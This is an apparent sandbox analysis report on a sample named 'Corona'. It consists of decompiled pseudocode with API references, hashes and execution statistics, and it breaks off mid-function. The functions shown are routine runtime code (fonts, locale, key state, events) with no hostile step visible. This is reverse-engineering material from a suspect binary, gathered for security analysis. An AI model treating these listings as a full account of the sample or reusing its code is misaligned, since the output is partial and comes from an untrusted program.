                                  • Instruction Fuzzy Hash: 3DF05470A81302BEF7906F21EE46F2B3794A312716F24007BF114791D2C6F879808A2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406724(void* __eax, int __ecx, long __edx) {
                                  				void* _t2;
                                  				void* _t4;
                                  
                                  				_t2 = GlobalHandle(__eax);
                                  				GlobalUnWire(_t2);
                                  				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
                                  				GlobalFix(_t4);
                                  				return _t4;
                                  			}






                                  APIs
                                  Similarity
                                  • API ID: Global$AllocHandleWire
                                  • String ID:
                                  • API String ID: 2210401237-0
                                  • Opcode ID: 12c31064beb9c0d1e1d5bb3fc420e02b111f226ff6da3f7fc0f00632f81f9461
                                  • Instruction ID: 9d1db75804b9264e0dea40b2bd66b9cab41c32f1d102a41729c62367d52e6118
                                  • Opcode Fuzzy Hash: 12c31064beb9c0d1e1d5bb3fc420e02b111f226ff6da3f7fc0f00632f81f9461
                                  • Instruction Fuzzy Hash: E1B009C4829A4338ED04B3B25C0FE7F041CDC8070C38059AF3508BA0839A7C9C441C3E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0041C440(void* __eax, void* __ebx, void* __ecx) {
                                  				signed int _v8;
                                  				struct tagLOGFONTA _v68;
                                  				char _v72;
                                  				char _v76;
                                  				char _v80;
                                  				intOrPtr _t76;
                                  				intOrPtr _t81;
                                  				void* _t107;
                                  				void* _t116;
                                  				intOrPtr _t126;
                                  				void* _t137;
                                  				void* _t138;
                                  				intOrPtr _t139;
                                  
                                  				_t137 = _t138;
                                  				_t139 = _t138 + 0xffffffb4;
                                  				_v80 = 0;
                                  				_v76 = 0;
                                  				_v72 = 0;
                                  				_t116 = __eax;
                                  				_push(_t137);
                                  				_push(0x41c5c9);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t139;
                                  				_v8 =  *((intOrPtr*)(__eax + 0x10));
                                  				if( *((intOrPtr*)(_v8 + 8)) != 0) {
                                  					 *[fs:eax] = 0;
                                  					_push(E0041C5D0);
                                  					return E00403E70( &_v80, 3);
                                  				} else {
                                  					_t76 =  *0x4528d8; // 0x2130a30
                                  					E0041B784(_t76);
                                  					_push(_t137);
                                  					_push(0x41c5a1);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t139;
                                  					if( *((intOrPtr*)(_v8 + 8)) == 0) {
                                  						_v68.lfHeight =  *(_v8 + 0x14);
                                  						_v68.lfWidth = 0;
                                  						_v68.lfEscapement = 0;
                                  						_v68.lfOrientation = 0;
                                  						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
                                  							_v68.lfWeight = 0x190;
                                  						} else {
                                  							_v68.lfWeight = 0x2bc;
                                  						}
                                  						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
                                  						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
                                  						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
                                  						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
                                  						E004040B0( &_v72, _v8 + 0x1b);
                                  						if(E00407AD0(_v72, "Default") != 0) {
                                  							E004040B0( &_v80, _v8 + 0x1b);
                                  							E00408308( &(_v68.lfFaceName), _v80);
                                  						} else {
                                  							E004040B0( &_v76, "\rMS Sans Serif");
                                  							E00408308( &(_v68.lfFaceName), _v76);
                                  						}
                                  						_v68.lfQuality = 0;
                                  						_v68.lfOutPrecision = 0;
                                  						_v68.lfClipPrecision = 0;
                                  						_t107 = E0041C724(_t116) - 1;
                                  						if(_t107 == 0) {
                                  							_v68.lfPitchAndFamily = 2;
                                  						} else {
                                  							if(_t107 == 1) {
                                  								_v68.lfPitchAndFamily = 1;
                                  							} else {
                                  								_v68.lfPitchAndFamily = 0;
                                  							}
                                  						}
                                  						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
                                  					}
                                  					_pop(_t126);
                                  					 *[fs:eax] = _t126;
                                  					_push(0x41c5a8);
                                  					_t81 =  *0x4528d8; // 0x2130a30
                                  					return E0041B790(_t81);
                                  				}
                                  			}

















                                  APIs
                                    • Part of subcall function 0041B784: RtlEnterCriticalSection.KERNEL32(?,0041B7C1), ref: 0041B788
                                  • CreateFontIndirectA.GDI32(?), ref: 0041C57E
                                  Strings
                                  Similarity
                                  • API ID: CreateCriticalEnterFontIndirectSection
                                  • String ID: MS Sans Serif$Default
                                  • API String ID: 2931345757-2137701257
                                  • Opcode ID: e0fe933b94f0d864d7b1dbacc94c2c03b0a508a8b1366433d5eaa37f6c4b7ecf
                                  • Instruction ID: 4c8d425f2b6d313922405b049071a1ed770be7e81967a9b87c544665316687c2
                                  • Opcode Fuzzy Hash: e0fe933b94f0d864d7b1dbacc94c2c03b0a508a8b1366433d5eaa37f6c4b7ecf
                                  • Instruction Fuzzy Hash: 49516030A44248DFDB01CFA5C981BCEBBF6EF49304F5540AAD404A7352D778AE85CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E0040AAAC(void* __ebx, void* __edi, void* __esi) {
                                  				int _v8;
                                  				signed int _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				void* _t53;
                                  				void* _t54;
                                  				intOrPtr _t80;
                                  				void* _t83;
                                  				void* _t84;
                                  				void* _t86;
                                  				void* _t87;
                                  				intOrPtr _t90;
                                  
                                  				_t89 = _t90;
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(_t90);
                                  				_push(0x40abbf);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t90;
                                  				_v8 = GetThreadLocale();
                                  				_t53 = 1;
                                  				_t86 = 0x4526a8;
                                  				_t83 = 0x4526d8;
                                  				do {
                                  					_t3 = _t53 + 0x44; // 0x45
                                  					E0040AA70(_t3 - 1, _t53 - 1,  &_v16, 0xb, _t89);
                                  					E00403EA0(_t86, _v16);
                                  					_t6 = _t53 + 0x38; // 0x39
                                  					E0040AA70(_t6 - 1, _t53 - 1,  &_v20, 0xb, _t89);
                                  					E00403EA0(_t83, _v20);
                                  					_t53 = _t53 + 1;
                                  					_t83 = _t83 + 4;
                                  					_t86 = _t86 + 4;
                                  				} while (_t53 != 0xd);
                                  				_t54 = 1;
                                  				_t87 = 0x452708;
                                  				_t84 = 0x452724;
                                  				do {
                                  					_t8 = _t54 + 5; // 0x6
                                  					asm("cdq");
                                  					_v12 = _t8 % 7;
                                  					E0040AA70(_v12 + 0x31, _t54 - 1,  &_v24, 6, _t89);
                                  					E00403EA0(_t87, _v24);
                                  					E0040AA70(_v12 + 0x2a, _t54 - 1,  &_v28, 6, _t89);
                                  					E00403EA0(_t84, _v28);
                                  					_t54 = _t54 + 1;
                                  					_t84 = _t84 + 4;
                                  					_t87 = _t87 + 4;
                                  				} while (_t54 != 8);
                                  				_pop(_t80);
                                  				 *[fs:eax] = _t80;
                                  				_push(E0040ABC6);
                                  				return E00403E70( &_v28, 4);
                                  			}


















                                  APIs
                                  • GetThreadLocale.KERNEL32(00000000,0040ABBF,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040AAC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: LocaleThread
                                  • String ID: Tl@$\k@
                                  • API String ID: 635194068-3608189427
                                  • Opcode ID: 0ac6bc8cb8082e4b21164c5ba209f0cd4bed27ba5fae9a67bf1f1be53a0a0437
                                  • Instruction ID: d2c94959ce0acc71ecf25258568ea482d5beb9c541544cc34f02ee37829f61b7
                                  • Opcode Fuzzy Hash: 0ac6bc8cb8082e4b21164c5ba209f0cd4bed27ba5fae9a67bf1f1be53a0a0437
                                  • Instruction Fuzzy Hash: 8F31A475B006085BDB00DA85C881E6F77AADB89314F51803BEA09E73C1DB3DAD458799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E004417E8(intOrPtr __eax, void* __edx) {
                                  				char _v8;
                                  				signed short _v10;
                                  				intOrPtr _v16;
                                  				char _v17;
                                  				char _v24;
                                  				intOrPtr _t34;
                                  				intOrPtr _t40;
                                  				intOrPtr _t42;
                                  				intOrPtr _t48;
                                  				void* _t51;
                                  				intOrPtr _t64;
                                  				intOrPtr _t67;
                                  				void* _t69;
                                  				void* _t71;
                                  				intOrPtr _t72;
                                  
                                  				_t69 = _t71;
                                  				_t72 = _t71 + 0xffffffec;
                                  				_t51 = __edx;
                                  				_v16 = __eax;
                                  				_v10 =  *((intOrPtr*)(__edx + 4));
                                  				if(_v10 == 0) {
                                  					return 0;
                                  				} else {
                                  					if(GetKeyState(0x10) < 0) {
                                  						_v10 = _v10 + 0x2000;
                                  					}
                                  					if(GetKeyState(0x11) < 0) {
                                  						_v10 = _v10 + 0x4000;
                                  					}
                                  					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
                                  						_v10 = _v10 + 0x8000;
                                  					}
                                  					_v24 =  *((intOrPtr*)(_v16 + 0x34));
                                  					_t34 =  *0x452ba4; // 0x2130da8
                                  					E0042358C(_t34,  &_v24);
                                  					_push(_t69);
                                  					_push(0x4418e6);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t72;
                                  					while(1) {
                                  						_v17 = 0;
                                  						_v8 = E004414EC(_v16, 2, _v10 & 0x0000ffff);
                                  						if(_v8 != 0) {
                                  							break;
                                  						}
                                  						if(_v24 == 0 || _v17 != 2) {
                                  							_pop(_t64);
                                  							 *[fs:eax] = _t64;
                                  							_push(0x4418ed);
                                  							_t40 =  *0x452ba4; // 0x2130da8
                                  							return E00423584(_t40);
                                  						} else {
                                  							continue;
                                  						}
                                  						goto L14;
                                  					}
                                  					_t42 =  *0x452ba4; // 0x2130da8
                                  					E0042358C(_t42,  &_v8);
                                  					_push(_t69);
                                  					_push(0x4418bb);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t72;
                                  					_v17 = E00441694( &_v8, 0, _t69);
                                  					_pop(_t67);
                                  					 *[fs:eax] = _t67;
                                  					_push(0x4418c2);
                                  					_t48 =  *0x452ba4; // 0x2130da8
                                  					return E00423584(_t48);
                                  				}
                                  				L14:
                                  			}



















                                  APIs
                                  • GetKeyState.USER32(00000010), ref: 0044180C
                                  • GetKeyState.USER32(00000011), ref: 0044181E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: State
                                  • String ID:
                                  • API String ID: 1649606143-3916222277
                                  • Opcode ID: 6a5531a57f7ee8e905a81f12160bad938abbcf11c77bbac6292ea13374682dca
                                  • Instruction ID: 806afbff69c5c72186e2cefbf9e0794c7fa794c62d13c121146b1b8644e40891
                                  • Opcode Fuzzy Hash: 6a5531a57f7ee8e905a81f12160bad938abbcf11c77bbac6292ea13374682dca
                                  • Instruction Fuzzy Hash: 90310530B04308AFFB15EFA5D94269DB7F5EF48304F5184BAEC04A72A2E77C5A84C658
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E0044E3BC(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _v8;
                                  				char _v9;
                                  				char _v16;
                                  				char _v20;
                                  				intOrPtr _t36;
                                  				long _t41;
                                  				intOrPtr _t52;
                                  				intOrPtr _t66;
                                  				intOrPtr* _t67;
                                  				intOrPtr _t68;
                                  				void* _t74;
                                  				void* _t75;
                                  				intOrPtr _t76;
                                  
                                  				_t72 = __esi;
                                  				_t71 = __edi;
                                  				_t74 = _t75;
                                  				_t76 = _t75 + 0xfffffff0;
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_v16 = 0;
                                  				_v20 = 0;
                                  				_v8 = __eax;
                                  				_push(_t74);
                                  				_push(0x44e4cc);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t76;
                                  				_t56 = E0044E344(_v8);
                                  				if( *((char*)(_v8 + 0x88)) != 0) {
                                  					_t52 = _v8;
                                  					_t79 =  *((intOrPtr*)(_t52 + 0x48));
                                  					if( *((intOrPtr*)(_t52 + 0x48)) == 0) {
                                  						E0044E914(_v8);
                                  					}
                                  				}
                                  				E0044C3F4(_t56,  &_v20);
                                  				E0042B958(_v20, 0,  &_v16, _t79);
                                  				_t36 =  *0x452bb0; // 0x2131714
                                  				E0044E57C(_t36, _v16, _t79);
                                  				_v9 = 1;
                                  				_push(_t74);
                                  				_push(0x44e473);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t76;
                                  				if( *((short*)(_v8 + 0x102)) != 0) {
                                  					_t56 = _v8;
                                  					 *((intOrPtr*)(_v8 + 0x100))();
                                  				}
                                  				if(_v9 != 0) {
                                  					E0044E2E0();
                                  				}
                                  				_pop(_t66);
                                  				 *[fs:eax] = _t66;
                                  				_t41 = GetCurrentThreadId();
                                  				_t67 =  *0x451128; // 0x452030
                                  				if(_t41 ==  *_t67 && E00418EF8(0, _t56, _t71, _t72) != 0) {
                                  					_v9 = 0;
                                  				}
                                  				if(_v9 != 0) {
                                  					WaitMessage();
                                  				}
                                  				_pop(_t68);
                                  				 *[fs:eax] = _t68;
                                  				_push(E0044E4D3);
                                  				return E00403E70( &_v20, 2);
                                  			}

















                                  APIs
                                    • Part of subcall function 0044E344: GetCursorPos.USER32 ref: 0044E34D
                                  • GetCurrentThreadId.KERNEL32 ref: 0044E488
                                  • WaitMessage.USER32(00000000,0044E4CC,?,?,?,0044F588), ref: 0044E4AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CurrentCursorMessageThreadWait
                                  • String ID: 0 E
                                  • API String ID: 535285469-1209576767
                                  • Opcode ID: f708ca782a39fb3c66121e6a314cd9b79fb23f62d6c9ba99ce538b5990acd397
                                  • Instruction ID: 16e9aaf56b4cd703d9d399fe4c5cf89c8dc545482637305d53f87ae60206ec12
                                  • Opcode Fuzzy Hash: f708ca782a39fb3c66121e6a314cd9b79fb23f62d6c9ba99ce538b5990acd397
                                  • Instruction Fuzzy Hash: F6319330A04244EFEB11DFA6C846AAEB7F5FB09314F5144BAE80497392D7789E40CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E004097CC(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                                  				char _v8;
                                  				short _v18;
                                  				short _v22;
                                  				struct _SYSTEMTIME _v24;
                                  				char _v280;
                                  				char* _t32;
                                  				intOrPtr* _t49;
                                  				intOrPtr _t58;
                                  				void* _t63;
                                  				void* _t67;
                                  
                                  				_v8 = 0;
                                  				_t49 = __edx;
                                  				_t63 = __eax;
                                  				_push(_t67);
                                  				_push(0x4098aa);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t67 + 0xfffffeec;
                                  				E00403E4C(__edx);
                                  				_v24 =  *((intOrPtr*)(_a4 - 0xe));
                                  				_v22 =  *((intOrPtr*)(_a4 - 0x10));
                                  				_v18 =  *((intOrPtr*)(_a4 - 0x12));
                                  				if(_t63 > 2) {
                                  					E00403EE4( &_v8, 0x4098cc);
                                  				} else {
                                  					E00403EE4( &_v8, 0x4098c0);
                                  				}
                                  				_t32 = E0040430C(_v8);
                                  				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
                                  					E004040BC(_t49, 0x100,  &_v280);
                                  					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
                                  						E0040436C( *_t49, E0040410C( *_t49) - 1, 2, _t49);
                                  					}
                                  				}
                                  				_pop(_t58);
                                  				 *[fs:eax] = _t58;
                                  				_push(E004098B1);
                                  				return E00403E4C( &_v8);
                                  			}














                                  APIs
                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,004098AA), ref: 00409852
                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,004098AA), ref: 00409858
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: DateFormatLocaleThread
                                  • String ID: yyyy
                                  • API String ID: 3303714858-3145165042
                                  • Opcode ID: 80921253b8fe827173fbe019159d22fbef38d3292844ab82dbd7b73aeb295454
                                  • Instruction ID: 86b8f1c99eb2c2116ed8d91da2cdce5be980b1c5e5238f581ede5124ef2b1d94
                                  • Opcode Fuzzy Hash: 80921253b8fe827173fbe019159d22fbef38d3292844ab82dbd7b73aeb295454
                                  • Instruction Fuzzy Hash: BA2174756106089BDB04FFA5C842AAEB7A8EF49700F50407BF904F73D2E6389E00CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042EBA0(void* __eflags, intOrPtr _a4) {
                                  				char _v5;
                                  				struct tagRECT _v21;
                                  				struct tagRECT _v40;
                                  				void* _t40;
                                  				void* _t45;
                                  
                                  				_v5 = 1;
                                  				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
                                  				_t45 = E00413754( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
                                  				if(_t45 <= 0) {
                                  					L5:
                                  					_v5 = 0;
                                  				} else {
                                  					do {
                                  						_t45 = _t45 - 1;
                                  						_t40 = E004136F8(_t44, _t45);
                                  						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
                                  							goto L4;
                                  						} else {
                                  							E0042E194(_t40,  &_v40);
                                  							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
                                  							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
                                  								goto L4;
                                  							}
                                  						}
                                  						goto L6;
                                  						L4:
                                  					} while (_t45 > 0);
                                  					goto L5;
                                  				}
                                  				L6:
                                  				return _v5;
                                  			}









                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Rect$EqualIntersect
                                  • String ID: @
                                  • API String ID: 3291753422-2766056989
                                  • Opcode ID: a9d5b4b8b104d74fda9fd87ce42a1811ab5083883410deb39bdc9c0d80e5de11
                                  • Instruction ID: 8a37059bed2244c262caaec57298d58cde423208b6fee6a9048858e295006f5e
                                  • Opcode Fuzzy Hash: a9d5b4b8b104d74fda9fd87ce42a1811ab5083883410deb39bdc9c0d80e5de11
                                  • Instruction Fuzzy Hash: 2C1191316042585BC711DAAEC885BDF7BE89F49318F4401A2FD14EB382D779DD458794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 54%
                                  			E00444C18(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				intOrPtr _t12;
                                  				intOrPtr _t16;
                                  				intOrPtr _t23;
                                  				char _t24;
                                  				intOrPtr _t25;
                                  				intOrPtr _t26;
                                  				void* _t30;
                                  				void* _t31;
                                  				intOrPtr _t32;
                                  
                                  				_t30 = _t31;
                                  				_t32 = _t31 + 0xfffffff4;
                                  				_v8 = 0;
                                  				_t23 =  *0x450c28; // 0x0
                                  				_v12 = _t23;
                                  				_t24 =  *0x450c34; // 0x0
                                  				_v16 = _t24;
                                  				 *0x450c28 = __eax;
                                  				 *0x450c34 = 0;
                                  				_push(_t30);
                                  				_push(0x444cbb);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t32;
                                  				_push(_t30);
                                  				_push(0x444c84);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t32;
                                  				_push(0);
                                  				_push(E00444BC8);
                                  				_push(GetCurrentThreadId());
                                  				L0040631C();
                                  				_t12 =  *0x450c34; // 0x0
                                  				_v8 = _t12;
                                  				_pop(_t25);
                                  				 *[fs:eax] = _t25;
                                  				_pop(_t26);
                                  				 *[fs:eax] = _t26;
                                  				_push(0x444cc2);
                                  				_t5 =  &_v16; // 0x426326
                                  				 *0x450c34 =  *_t5;
                                  				_t16 = _v12;
                                  				 *0x450c28 = _t16;
                                  				return _t16;
                                  			}
















                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00444C67
                                  • 72E7AC10.USER32(00000000,00444BC8,00000000,00000000,00444C84,?,00000000,00444CBB), ref: 00444C6D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CurrentThread
                                  • String ID: &cB
                                  • API String ID: 2882836952-360971160
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00423A14(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t15;
                                  				void* _t16;
                                  				intOrPtr _t18;
                                  				signed int _t19;
                                  				void* _t20;
                                  				intOrPtr _t21;
                                  
                                  				_t19 = _a12;
                                  				if( *0x452923 != 0) {
                                  					_t16 = 0;
                                  					if((_t19 & 0x00000003) != 0) {
                                  						L7:
                                  						_t16 = 0x12340042;
                                  					} else {
                                  						_t21 = _a4;
                                  						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                                  							goto L7;
                                  						}
                                  					}
                                  				} else {
                                  					_t18 =  *0x452904; // 0x423a14
                                  					 *0x452904 = E0042377C(3, _t15, _t18, _t19, _t20);
                                  					_t16 =  *0x452904(_a4, _a8, _t19);
                                  				}
                                  				return _t16;
                                  			}














                                  APIs
                                  • GetSystemMetrics.USER32 ref: 00423A62
                                  • GetSystemMetrics.USER32 ref: 00423A74
                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: MonitorFromPoint
                                  • API String ID: 1792783759-1072306578
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E0040C864(void* __edx) {
                                  				void* _t6;
                                  				void* _t13;
                                  				void* _t17;
                                  				void* _t20;
                                  				void* _t21;
                                  				void* _t22;
                                  
                                  				_t17 = __edx;
                                  				if(__edx != 0) {
                                  					_t22 = _t22 + 0xfffffff0;
                                  					_t6 = E00403420(_t6, _t21);
                                  				}
                                  				_t20 = _t6;
                                  				E004030CC(0);
                                  				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
                                  				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
                                  				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
                                  				 *(_t20 + 0x18) = 0xffffffff;
                                  				 *((intOrPtr*)(_t20 + 0x20)) = E004030CC(1);
                                  				_t13 = _t20;
                                  				if(_t17 != 0) {
                                  					E00403478(_t13);
                                  					_pop( *[fs:0x0]);
                                  				}
                                  				return _t20;
                                  			}










                                  APIs
                                  • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,0041A3A5,00000000,0041A3F9), ref: 0040C88E
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,0041A3A5,00000000,0041A3F9), ref: 0040C89E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CreateEvent
                                  • String ID: \w@
                                  • API String ID: 2692171526-2353373287
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:381
                                  Total number of Limit Nodes:13

                                  Graph


                                  Executed Functions

                                  Control-flow Graph

                                  C-Code - Quality: 65%
                                  			E00405070(intOrPtr __eax) {
                                  				intOrPtr _v8;
                                  				void* _v12;
                                  				char _v15;
                                  				char _v17;
                                  				char _v18;
                                  				char _v22;
                                  				int _v28;
                                  				char _v289;
                                  				long _t44;
                                  				long _t61;
                                  				long _t63;
                                  				CHAR* _t70;
                                  				CHAR* _t72;
                                  				struct HINSTANCE__* _t78;
                                  				struct HINSTANCE__* _t84;
                                  				char* _t94;
                                  				void* _t95;
                                  				intOrPtr _t99;
                                  				struct HINSTANCE__* _t107;
                                  				void* _t110;
                                  				void* _t112;
                                  				intOrPtr _t113;
                                  
                                  				_t110 = _t112;
                                  				_t113 = _t112 + 0xfffffee0;
                                  				_v8 = __eax;
